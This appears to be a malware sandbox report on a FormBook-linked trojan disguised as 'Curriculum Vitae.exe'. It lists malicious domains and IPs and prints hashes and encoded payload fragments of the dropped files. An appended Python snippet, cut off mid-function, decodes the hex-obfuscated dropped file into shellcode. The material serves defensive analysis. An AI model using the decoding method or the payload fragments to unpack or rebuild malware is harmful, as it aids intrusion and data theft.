http://www.chinaen.org/lol/197.html | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/lol/203.html | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-4.3.3.min.css | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.chinaen.org/lol/200.html | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/zb_users/theme/yd1125free/style/images/logo.png | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/ | firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/zb_system/login.php | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.zblogcn.com/ | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/zb_users/theme/yd1125free/style/style.min.css?v=1.2.4 | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/lol/201.html | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.htmlit.com.cn/ | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/lol/204.html | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/search.php?act=search | firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.mediaplug.biz | OAIexgManRWDie.exe, 00000007.00000002.3272150093.0000000005258000.00000040.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/zb_system/script/c_html_js_add.php | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | regsvr32.exe, 00000006.00000002.3273025695.0000000007F48000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.chinaen.org/lol/199.html | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/lol/196.html | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.chinaen.org/zb_system/script/zblogphp.js | regsvr32.exe, 00000006.00000002.3271358801.0000000005574000.00000004.10000000.00040000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270771912.0000000003184000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2958938991.000000003F3E4000.00000004.80000000.00040000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
195.110.124.133 | marcoiozia.info | Italy | 39729 | REGISTER-ASIT | true
188.114.96.3 | www.chinaen.org | European Union | 13335 | CLOUDFLARENETUS | true
84.32.84.32 | godoggyonbase.online | Lithuania | 33922 | NTT-LT-ASLT | true
66.81.203.200 | www.mediaplug.biz | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1501087
Start date and time: 2024-08-29 12:13:32 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Curriculum Vitae.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@5/4
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 54
• Number of non-executed functions: 285
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
Time | Type | Description
06:16:01 | API Interceptor | 28x Sleep call for process: regsvr32.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
195.110.124.133 | Document_pdf.exe | malicious | FormBook | www.marcoiozia.info/1a0o/
195.110.124.133 | ptsss.exe | malicious | FormBook | www.maggimilano.fun/aj6h/
195.110.124.133 | z1DOCUMENTINV.exe | malicious | FormBook | www.maggimilano.fun/c9b6/
195.110.124.133 | #U0423#U0432#U0435#U0434#U043e#U043c#U043b#U0435#U043d#U0438#U0435 #U2116 24357.exe | malicious | FormBook, GuLoader | www.maggimilano.fun/b3tb/
195.110.124.133 | rPHOTO09AUG2024.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | 00451.exe | malicious | FormBook | www.maggimilano.fun/aj6h/
195.110.124.133 | Payment advice.exe | malicious | FormBook | www.emme4.online/dujn/
195.110.124.133 | Quotation-581024.exe | malicious | FormBook | www.emme4.online/dujn/
195.110.124.133 | QUOTATION.exe | malicious | FormBook | www.emme4.online/dujn/
195.110.124.133 | QLLafoDdqv.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
188.114.96.3 | Fordybendes.exe | malicious | Azorult, GuLoader | d4hk.shop/DL341/index.php
188.114.96.3 | ORDER_38746_pdf.exe | malicious | FormBook | www.begumnasreenbano.com/e8by/
188.114.96.3 | QUOTATION_AUGQTRA071244#U00b7PDF.scr | malicious | Unknown | filetransfer.io/data-package/zbi9vNYx/download
188.114.96.3 | QUOTATION_AUGQTRA071244PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | filetransfer.io/data-package/kDY6Kvx6/download
188.114.96.3 | PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat | malicious | FormBook, GuLoader, Remcos | www.katasoo.com/7qad/
188.114.96.3 | 709876765465.exe | malicious | DBatLoader, FormBook | www.coinwab.com/kqqj/
188.114.96.3 | http://allegro-8888.com/ | malicious | Unknown | allegro-8888.com/xml/index.html
188.114.96.3 | PO_112234525626823775.js | malicious | Lokibot | werdotx.shop/Devil/PWS/fre.php
188.114.96.3 | nOyswc9ly2.dll | malicious | Unknown | web.ad87h92j.com/4/t.bmp
188.114.96.3 | pXm5oVO3Go.exe | malicious | Nitol | web.ad87h92j.com/4/t.bmp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.mediaplug.biz | z11SOAAUG2408.exe | malicious | FormBook | 66.81.203.200
www.mediaplug.biz | DN.exe | malicious | FormBook | 66.81.203.135
www.mediaplug.biz | Filename.exe | malicious | DarkTortilla, FormBook | 66.81.203.200
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NTT-LT-ASLT | ORDER_38746_pdf.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | quotation.exe | malicious | DarkTortilla, FormBook | 84.32.84.32
NTT-LT-ASLT | Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | factura-630.900.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | PAGO $630.900.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | Payment_Advice.exe | malicious | FormBook, GuLoader | 84.32.84.32
NTT-LT-ASLT | bot.arm5.elf | malicious | Mirai, Gafgyt, Okiru | 84.32.84.33
NTT-LT-ASLT | bot.arm.elf | malicious | Mirai, Gafgyt, Okiru | 84.32.84.33
NTT-LT-ASLT | bot.m68k.elf | malicious | Mirai, Gafgyt, Okiru | 84.32.84.33
NTT-LT-ASLT | bot.arm7.elf | malicious | Mirai, Okiru | 84.32.84.33
REGISTER-ASIT | Document_pdf.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | ptsss.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | z1DOCUMENTINV.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | #U0423#U0432#U0435#U0434#U043e#U043c#U043b#U0435#U043d#U0438#U0435 #U2116 24357.exe | malicious | FormBook, GuLoader | 195.110.124.133
REGISTER-ASIT | z55FACTURADEPROFORMApdf.exe | malicious | FormBook, PureLog Stealer | 81.88.57.70
REGISTER-ASIT | Transferencia bancaria.scr.exe | malicious | FormBook | 81.88.57.70
REGISTER-ASIT | rPHOTO09AUG2024.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | 00451.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Payment advice.exe | malicious | FormBook | 195.110.124.133
REGISTER-ASIT | Quotation-581024.exe | malicious | FormBook | 195.110.124.133
CONFLUENCE-NETWORK-INCVG | ORDER_38746_pdf.exe | malicious | FormBook | 208.91.197.39
CONFLUENCE-NETWORK-INCVG | Payment Advice.exe | malicious | FormBook | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | z11SOAAUG2408.exe | malicious | FormBook | 66.81.203.200
CONFLUENCE-NETWORK-INCVG | COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exe | malicious | FormBook | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | DN.exe | malicious | FormBook | 66.81.203.135
CONFLUENCE-NETWORK-INCVG | http://www.empoweryourretirement.com | malicious | Unknown | 208.91.196.253
CONFLUENCE-NETWORK-INCVG | DHL AWB TRACKING DETAILS.exe | malicious | FormBook | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | Bonelessness.exe | malicious | Simda Stealer | 199.191.50.83
CONFLUENCE-NETWORK-INCVG | roundwood.exe | malicious | Simda Stealer | 199.191.50.83
CONFLUENCE-NETWORK-INCVG | proforma invoice.exe | malicious | FormBook | 208.91.197.27
CLOUDFLARENETUS | Fordybendes.exe | malicious | Azorult, GuLoader | 188.114.96.3
CLOUDFLARENETUS | G_24370-24396_SI2_S25_8658_MPO_SMARTEX_240715.exe | malicious | AgentTesla, DarkTortilla | 172.67.74.152
CLOUDFLARENETUS | Offer 2024-30496.exe | malicious | Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | pagamento.exe | malicious | Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | Po#70831.exe | malicious | Azorult | 172.67.128.117
CLOUDFLARENETUS | payment PAGO 2974749647839452.js | malicious | Unknown | 162.159.130.233
CLOUDFLARENETUS | Document_pdf.exe | malicious | FormBook | 104.21.62.58
CLOUDFLARENETUS | file.exe | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | Great Wall Motor Sale Bank_Sift_Copy.Pdf.exe | malicious | AgentTesla, DarkTortilla | 104.26.13.205
                    No context
                    No context
Process: C:\Users\user\Desktop\Curriculum Vitae.exe
File Type: data
Category: dropped
Size (bytes): 286208
Entropy (8bit): 7.993020730439002
Encrypted: true
SSDEEP: 6144:GjBxdypuuq8TPH0NroZyKw+TtQzPIIBSKTZfYB6QY13zFkvvupYj:G1GqVNoop3gL1a3ouu
MD5: 9FFBC2625813D547E53B556365627908
SHA1: A489B79CCCCC3B147AD7346DDE69CA37163BBC8F
SHA-256: E7B272E21627C7C321D34F988DDD793C5F0479BDEE1A93EE1A01B836451F79FC
SHA-512: 9F9CDE9F414242DDD4B9E2FDC77F3097B52E38E40092B627AF33BEAC051FBCA76832EF8BA075853582B61D74EE17583FA9BD811197165FA4DEE8A757E624788F
Malicious: false
Reputation: low
                    Preview:t....0ZTB...[...o.63..eAN...9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH.BSP8/.ZB.K.s.Iu.r.^Y)t2?-! #%.!2>X_.t (b4',hP,s.ycz9-)'h_OB.BSP60ZT;LK.o"/..37..:3.W..x(^.I...f4%.X...tY%.._S2i"*.FRBH9BSPfuZT.LCFO7.`BSP60ZTB.BDSII2BS.20ZTBMBFRB.-BSP&0ZT"IBFR.H9RSP62ZTDMBFRBH9DSP60ZTBM"BRBJ9BSP60XT..BFBBH)BSP6 ZTRMBFRBH)BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBF|6-A6SP6..PBMRFRB.=BS@60ZTBMBFRBH9BSp60:TBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBM
Process: C:\Users\user\Desktop\Curriculum Vitae.exe
File Type: data
Category: dropped
Size (bytes): 43558
Entropy (8bit): 7.824619090082407
Encrypted: false
SSDEEP: 768:qk6ES00M4qaPKWXSd8AA650W6jXAy0dR6n9uTuEk4LC+Ib1nQvLUyu1:q/ES0P4NyWXyB1v6DAvdYU6zOE1QvYt1
MD5: 476EE29C5272F2D9605F9AF1C14FB92E
SHA1: 2091C2BB825DA1F1A523E3841434F303B4867B7B
SHA-256: 4FE6632A2BFD577BE2453FC069353FB211E59F339BD8EFC07C079699DA186A3E
SHA-512: 209A38425CF67BCD411F3F02F2EA6BE7E0A81E4A4082A8F8BFA4921291E308CB96101A9C7E620F30935DF72FC97E83724DE7614296966FF98401D1C505096BA6
Malicious: false
Reputation: low
                    Preview:EA06..P...)3y.:g5.L....6.Pf.Z..gF..&s...kS.L...l.gV..)S9.Fg0....)..3.U.sZ..mW..iS9.Zm2.......6.V.s...%G..).9.2g0....I..3.i'5I......(.9.>m2..)39.*g5.L...e<...f..Jd.mF...9.\..M......6.Uf....oO....u*g0..3 ...IZ......3...6*..)6.Rfs....6.... ..K..)..Ud....(s9..qW..+.i.Vm2.L.5)...$.~4`.X...@.j..mVfsJ..iL..)si.Jm2.M.4y......T..X...G.'..:qJ..h.9.6g5....I..6.V&s...gX...`...yI.3........Ufs....,..L...2m2.L.4..3.?.6...]X.<...6..0.(..m4.M)s9..qY.DfT...A0.o...6...U.....l.P.r.3..s@.`.......%Bg0...T ...(....J\.qM...39......l. ..l..U....t.........:...U....$...T...gH.n........Q*..+9..4Y..3....x.$..R@!..yR..&.0.R..3......y.0.....8J|.qE..@... ...;f..:.6.Sf.j..l..U&..\.oM....J...K....J..4.^R.3....4.I(.`. .,..i.i.Vl.f.r.4...O.6.`..P.............`.VM....$.&...0.$.......#t.K...J...Q@. &r.6.PfsJ$.b....b.6.V@.....6..<.....V."....N...l ...@..*.s.!0...F.#.L.F..U)..3.j...P.-X.e..3...B.H...D.kQ.4&.ZP.=F.M.`$..AT.L..6..g4..g.`-....l..p.b..U.....9N.....p.aA....!2.6.-.|. .uX..(`...
Process: C:\Windows\SysWOW64\regsvr32.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\Curriculum Vitae.exe
                    File Type:ASCII text, with very long lines (65536), with no line terminators
                    Category:dropped
                    Size (bytes):86022
                    Entropy (8bit):4.179065972475195
                    Encrypted:false
                    SSDEEP:1536:tAykfwPqPE+m+uyC2a5ok2g5m65XBNOWHBhczvUYUOQO9l:Wyw0yrAo25moxNtDEcj2
                    MD5:2B05DA0582676E5BEA8A1FEF1F5BB90A
                    SHA1:9793CF0DAB681D1B260F77AA24BDA2B1E54AAE4D
                    SHA-256:C08BCDF333F033D5D6F96F8D5B64B2E4E899A964CA31E351BE2A5D40DB30C437
                    SHA-512:853B7B84DEB415EA319F821FECA8E9197AD6DDF8927C4BF2A4E28CF19215E1EE41211872F168689E0C260EAD3A2F78C9462BA621EEEEF560D495B97028BC9519
                    Malicious:false
                    Reputation:low
                    Preview:30I78N35P35A38Y62A65T63F38Y31W65S63T63M63V30J32Q30S30R30T30V35S36W35J37V62G38P36X62Z30Y30R30G30M30L30E36D36T38N39T34N35T38D34O62N39I36J35X30X30O30Y30Q30Z30L36F36M38W39T34R64F38L36F62U61B37O32E30M30J30N30E30T30D36Z36U38P39G35W35A38P38W62I38S36D65F30Y30D30N30K30H30E36Y36U38N39C34P35W38X61U62D39R36I35W30S30F30O30S30R30D36Y36N38N39Y34A64L38K63R62B61G36R63R30R30A30Q30H30V30Z36I36J38J39F35M35Y38T65B62X38B33X33C30H30T30I30V30R30Y36X36T38U39P34F35D39H30L62F39L33Q32X30Y30W30E30X30I30V36M36S38T39T34C64W39K32W62Y61B32I65D30C30H30D30M30K30V36Q36V38L39Y35G35V39B34W62F38C36P34P30P30J30B30H30N30P36V36K38M39Y34Q35N39S36B62B39T36T63W30J30H30L30P30O30Y36P36C38J39L34A64Z39U38O62B61H36D63H30R30D30D30B30H30D36Y36N38B39F35S35G39K61E33Y33B63H30O36Y36P38I39S34V35R39T63Y62L39S36B65C30T30X30O30L30W30S36C36O38E39W38C64B34W34C66J66J66R66M66V66L62T61K37M34T30U30B30K30K30B30A36I36F38K39U39J35X34R36E66D66T66D66O66U66X62M38M36Y34O30G30C30K30T30F30V36Q36B38U39Q38C35C34V38Y66W66D66I66W66G66S62I39J36G63X30V30E30T30Q30J3
                    Process:C:\Users\user\Desktop\Curriculum Vitae.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):286208
                    Entropy (8bit):7.993020730439002
                    Encrypted:true
                    SSDEEP:6144:GjBxdypuuq8TPH0NroZyKw+TtQzPIIBSKTZfYB6QY13zFkvvupYj:G1GqVNoop3gL1a3ouu
                    MD5:9FFBC2625813D547E53B556365627908
                    SHA1:A489B79CCCCC3B147AD7346DDE69CA37163BBC8F
                    SHA-256:E7B272E21627C7C321D34F988DDD793C5F0479BDEE1A93EE1A01B836451F79FC
                    SHA-512:9F9CDE9F414242DDD4B9E2FDC77F3097B52E38E40092B627AF33BEAC051FBCA76832EF8BA075853582B61D74EE17583FA9BD811197165FA4DEE8A757E624788F
                    Malicious:false
                    Reputation:low
                    Preview:t....0ZTB...[...o.63..eAN...9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH.BSP8/.ZB.K.s.Iu.r.^Y)t2?-! #%.!2>X_.t (b4',hP,s.ycz9-)'h_OB.BSP60ZT;LK.o"/..37..:3.W..x(^.I...f4%.X...tY%.._S2i"*.FRBH9BSPfuZT.LCFO7.`BSP60ZTB.BDSII2BS.20ZTBMBFRB.-BSP&0ZT"IBFR.H9RSP62ZTDMBFRBH9DSP60ZTBM"BRBJ9BSP60XT..BFBBH)BSP6 ZTRMBFRBH)BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBF|6-A6SP6..PBMRFRB.=BS@60ZTBMBFRBH9BSp60:TBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBMBFRBH9BSP60ZTBM
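Each dropped-file record above carries an "Entropy (8bit)" value and an "Encrypted" flag, and the 86,022-byte ASCII file dropped by Curriculum Vitae.exe previews as two-character groups separated by single uppercase letters. The script below is an added example, not code from the report or from Joe Sandbox. It recomputes an 8-bit Shannon entropy (that this is the report's formula, and the 7.9 "Encrypted" threshold, are assumptions) and strips the filler letters from a copy of that preview. Doing so yields the ASCII text "0x558bec81eccc020000...", a second hex layer whose first bytes are 55 8b ec 81 ec cc 02 00 00 (push ebp; mov ebp, esp; sub esp, 0x2cc), followed by the 32-bit immediates 0x6b, 0x65, 0x72, 0x6e being stored to the stack as 16-bit words, i.e. the characters "kern". What the rest of the file builds is not shown on this page. The sample strings are constructed from the report's own Preview fields.

```python
"""Recompute two per-file measurements for the dropped files listed above.

Added example; not part of the Joe Sandbox report. Assumptions: the report's
"Entropy (8bit)" is Shannon entropy in bits per byte and "Encrypted" is a
threshold on it; the ASCII dropped file is lowercase hex-digit pairs, each
followed by one uppercase filler letter.
"""
import math
from collections import Counter

# Constructed: the first 82 triplets of the report's Preview of the ASCII dropped file.
ASCII_PREVIEW = (
    "30I78N35P35A38Y62A65T63F38Y31W65S63T63M63V30J32Q30S30R30T30V35S36W35J37V62G38P36X62Z"
    "30Y30R30G30M30L30E36D36T38N39T34N35T38D34O62N39I36J35X30X30O30Y30Q30Z30L36F36M38W39T"
    "34R64F38L36F62U61B37O32E30M30J30N30E30T30D36Z36U38P39G35W35A38P38W62I38S36D65F"
)

# Constructed stand-in for the SQLite file dropped by regsvr32.exe: header plus zero pages.
SQLITE_PREVIEW = b"SQLite format 3\x00" + b"\x00" * 2000


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for one repeated value, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes, threshold: float = 7.9) -> bool:
    """Flag comparable to the report's 'Encrypted' column; the threshold is an assumption."""
    return shannon_entropy(data) >= threshold


def strip_interleaved_hex(text: str) -> bytes:
    """Decode 'hhX' triplets: two lowercase hex digits, then one uppercase filler letter.

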